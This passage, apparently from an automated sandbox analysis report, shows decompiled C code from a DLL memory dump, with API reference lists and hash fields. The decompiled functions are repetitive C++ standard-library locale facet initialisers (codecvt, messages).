																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6D4866BA(_t814 - 0x14);
																													return E6D4A0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6D491230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t814 - 0x20);
																															E6D4A3D74(_t814 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t575, _t766, _t785, 0x14);
																															E6D486653(_t814 - 0x14, 0);
																															_t786 =  *0x6d546dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6D46161C(0x6d546d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6D4866BA(_t814 - 0x14);
																																return E6D4A0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6D4912B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t814 - 0x20);
																																		E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t575, _t767, _t786, 0x14);
																																		E6D486653(_t814 - 0x14, 0);
																																		_t787 =  *0x6d546dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6D46161C(0x6d546d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6D4866BA(_t814 - 0x14);
																																			return E6D4A0075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6D491339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t814 - 0x20);
																																					E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t575, _t768, _t787, 0x14);
																																					E6D486653(_t814 - 0x14, 0);
																																					_t788 =  *0x6d546db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6D46161C(0x6d546d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6D4866BA(_t814 - 0x14);
																																						return E6D4A0075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6D4913A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t814 - 0x20);
																																								E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t575, _t769, _t788, 0x14);
																																								E6D486653(_t814 - 0x14, 0);
																																								_t789 =  *0x6d546ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6D46161C(0x6d546d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6D4866BA(_t814 - 0x14);
																																									return E6D4A0075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6D491409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t814 - 0x20);
																																											E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t575, _t770, _t789, 0x14);
																																											E6D486653(_t814 - 0x14, 0);
																																											_t790 =  *0x6d546de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6D46161C(0x6d546d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6D4866BA(_t814 - 0x14);
																																												return E6D4A0075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6D491471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t814 - 0x20);
																																														E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t575, _t771, _t790, 0x14);
																																														E6D486653(_t814 - 0x14, 0);
																																														_t791 =  *0x6d546dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6D46161C(0x6d546da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6D4866BA(_t814 - 0x14);
																																															return E6D4A0075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6D4914EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t814 - 0x20);
																																																	E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t575, _t772, _t791, 0x14);
																																																	E6D486653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6d546dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6D46161C(0x6d546d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6D4866BA(_t814 - 0x14);
																																																		return E6D4A0075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6D491558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t814 - 0x20);
																																																				E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t575, _t773, _t792, 0x14);
																																																				E6D486653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6d546e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6D46161C(0x6d546dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6D4866BA(_t814 - 0x14);
																																																					return E6D4A0075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6D4915C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t814 - 0x20);
																																																							E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t575, _t774, _t793, 0x14);
																																																							E6D486653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6d546dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6D46161C(0x6d546d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6D46171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6D4866BA(_t814 - 0x14);
																																																								return E6D4A0075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6D49162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6D461438(_t701);
																																																										E6D4A3D74(_t814 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6d4ec0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6D49542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6D4A0075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6D486FD3(__eflags, _t775);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6d546dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6D486FD3(__eflags, _t774);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6d546e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6D486FD3(__eflags, _t773);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6d546dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6D486FD3(__eflags, _t772);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6d546dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6D486FD3(__eflags, _t771);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6d546de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6D486FD3(__eflags, _t770);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6d546ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6D486FD3(__eflags, _t769);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6d546db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6D486FD3(__eflags, _t768);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6d546dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6D486FD3(__eflags, _t767);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6d546dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6D486FD3(__eflags, _t766);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6d546dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6D486FD3(__eflags, _t765);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6d546df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6D486FD3(__eflags, _t764);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6d546df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6D486FD3(__eflags, _t763);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6d546dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6D486FD3(__eflags, _t762);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6d546df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6D486FD3(__eflags, _t761);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6d546dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6D486FD3(__eflags, _t760);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6d546dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6D486FD3(__eflags, _t759);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6d546db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6D486FD3(__eflags, _t758);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6d546de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F18A
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F194
int.LIBCPMT ref: 6D48F1AB

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D48F1CE
std::_Facet_Register.LIBCPMT ref: 6D48F1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F205
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F223

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 6568c177ef03cc1c69da668d0257a6c78a776307162f9c4b66e8a415c6206e7a
Instruction ID: 5a99b7f65265759ffd0d48feef9e49f569a695555c07ad6fd3f20d62cac4975f
Opcode Fuzzy Hash: 6568c177ef03cc1c69da668d0257a6c78a776307162f9c4b66e8a415c6206e7a
Instruction Fuzzy Hash: 9011E0768082599BCF05EBA0C840EEDB774AF90314F2A400DD612AB395DB70ED00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t220 =  *0x6d546cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6D46161C(0x6d546cc4);
				_t164 = _a8;
				_t78 = E6D46171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t214, _t220, 0x14);
							E6D486653( &_v20, 0);
							_t221 =  *0x6d546cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6D46161C(0x6d546b38);
							_t171 = _a8;
							_t215 = E6D46171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438( &_v32);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t161, _t215, _t221, 0x14);
										E6D486653( &_v20, 0);
										_t222 =  *0x6d546ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6D46161C(0x6d546cb8);
										_t178 = _a8;
										_t216 = E6D46171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6D4866BA( &_v20);
											return E6D4A0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D48AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438( &_v32);
													E6D4A3D74( &_v32, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t161, _t216, _t222, 0x14);
													E6D486653( &_v20, 0);
													_t223 =  *0x6d546cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6D46161C(0x6d546cbc);
													_t185 = _a8;
													_t217 = E6D46171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6D4866BA( &_v20);
														return E6D4A0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6D48AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438( &_v32);
																E6D4A3D74( &_v32, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t161, _t217, _t223, 0x14);
																E6D486653( &_v20, 0);
																_t224 =  *0x6d546cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6D46161C(0x6d546cc0);
																_t192 = _a8;
																_t218 = E6D46171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6D4866BA( &_v20);
																	return E6D4A0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6D48AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6D461438(_t196);
																			E6D4A3D74( &_v32, 0x6d543504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6d4eba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6D486FD3(__eflags, _t218);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6d546cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6D486FD3(__eflags, _t217);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6d546cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6D486FD3(__eflags, _t216);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6d546ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6D486FD3(__eflags, _t215);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6d546cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6D486FD3(__eflags, _t214);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6d546cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48A060
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A06A
int.LIBCPMT ref: 6D48A081

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D48A0A4
std::_Facet_Register.LIBCPMT ref: 6D48A0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A0F9

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: dcc95e8ee0bb650c5e73de5fec24a358982cf597e2bd9543f4d5985ad39bea20
Instruction ID: b5e3fd4975a2125cfaea5dbc4cb621273dd466606c0a356cc3d223e7003aec8a
Opcode Fuzzy Hash: dcc95e8ee0bb650c5e73de5fec24a358982cf597e2bd9543f4d5985ad39bea20
Instruction Fuzzy Hash: 3E11CE768082699BCF01EBA4C841EEDB774AF91314F2A400CD611B7392CBB4DD04C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6D48A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t52 =  *0x6d546cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6D46161C(0x6d546cc0);
				_t40 = _a8;
				_t22 = E6D46171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6D461438(_t44);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6d4eba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6D486FD3(__eflags, _t50);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6d546cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48A2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A302
int.LIBCPMT ref: 6D48A319

